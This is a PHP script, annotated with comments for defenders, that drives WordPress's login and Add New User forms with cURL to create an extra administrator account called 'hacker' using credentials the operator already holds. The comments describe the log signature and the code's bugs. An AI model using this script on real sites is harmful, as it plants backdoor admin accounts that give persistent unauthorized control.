
wp-exploit2.php

<?php
// Flat script: authenticates to a WordPress site with credentials the operator
// already holds, fetches the "Add New User" admin form to read its CSRF nonce,
// then submits that form with role=administrator. Nothing here bypasses a
// control: every step is the normal admin workflow driven through cURL, and it
// only succeeds with a valid administrator login (see $username/$password below).
// From a defender's view the useful part is the request pattern it leaves in
// logs: POST /wp-login.php, then GET + POST /wp-admin/user-new.php with
// role=administrator, all under a static, ancient user agent, followed by a new
// admin account appearing in wp_users — an audit log or "new administrator
// created" alert catches this regardless of how the request was scripted.
//
// The script does no error handling: curl_exec() returning false, a failed
// login, or a missing nonce are never checked, so strpos() returning false
// silently degrades into offset arithmetic on garbage.

// set the url of the wordpress site to do this on
$wp_url = 'http://localhost/wordpress';
// this will only work if we already have a username and password
$username = 'admin';
$password = 'supersecret';
// set the username, password, and email of the new user we will create
$new_username = 'hacker';
$new_password = 'letmein';
$new_email = 'hacker@fakeemailaddress.com';
// make up a user agent to use, lets say IE6 again
// (a fixed MSIE 6.0 string on admin endpoints is itself an easy log signature)
$user_agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
// start by logging into wordpress (using POST, not GET)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
// NOTE: redirect_to is hard-coded to localhost/wordpress rather than derived
// from $wp_url, so it goes stale as soon as $wp_url is changed.
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log='.urlencode($username).'&pwd='.urlencode($password).'&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Headers are kept in $output because the session cookies are scraped from the
// raw Set-Cookie lines below instead of using a cookie jar.
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
$output = curl_exec($ch);
curl_close($ch);
// search $output for the four cookies, add them to an array
// Assumes the login response carries exactly four Set-Cookie headers and that
// each cookie value ends at the first ';'. If the login failed (fewer cookies),
// strpos() returns false and the substr() offsets become meaningless.
$index = 0;
$cookieStrings = array();
for($i=0; $i<4; $i++) {
    $start_string = 'Set-Cookie: ';
    $start = strpos($output, $start_string, $index) + strlen($start_string);
    $end_string = ';';
    $end = strpos($output, $end_string, $start);
    $cookieStrings[] = substr($output, $start, $end-$start);
    // strlen($end) is the digit count of the integer offset, not strlen($end_string);
    // harmless here because the next iteration searches for the next header anyway.
    $index = $end + strlen($end);
}
// turn cookies into a single cookie string (skipping 4th cookie, since it's the same as 2nd)
// (the comment says "4th" but the code drops index 2 and keeps index 3)
$cookie = $cookieStrings[0].'; '.$cookieStrings[1].'; '.$cookieStrings[3];
// load the add user page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
$output = curl_exec($ch);
curl_close($ch);
// search for _wpnonce hidden field value
// The nonce is WordPress's CSRF token for this form; it is read from the
// authenticated page, which is why the session cookies were needed first.
// The match depends on the exact markup of the hidden input (id, name, value
// order and the '" />' terminator); a markup change yields an empty or wrong nonce.
$start_string = '<input type="hidden" id="_wpnonce" name="_wpnonce" value="';
$start = strpos($output, $start_string, 0) + strlen($start_string);
$end_string = '" />';
$end = strpos($output, $end_string, $start);
$_wpnonce = substr($output, $start, $end-$start);
// add our new user
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_POST, true);
// NOTE: _wp_http_referer is hard-coded to /wordpress/... like redirect_to above.
curl_setopt($ch, CURLOPT_POSTFIELDS, '_wpnonce='.urlencode($_wpnonce).'&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&action=adduser&user_login='.urlencode($new_username).'&first_name=&last_name=&email='.urlencode($new_email).'&url=&pass1='.urlencode($new_password).'&pass2='.urlencode($new_password).'&role=administrator&adduser=Add+User');
curl_setopt($ch, CURLOPT_REFERER, $wp_url.'/wp-admin/user-new.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
// The response is captured but never inspected, so the script gives no
// indication of whether the user was actually created.
$output = curl_exec($ch);
curl_close($ch);
?>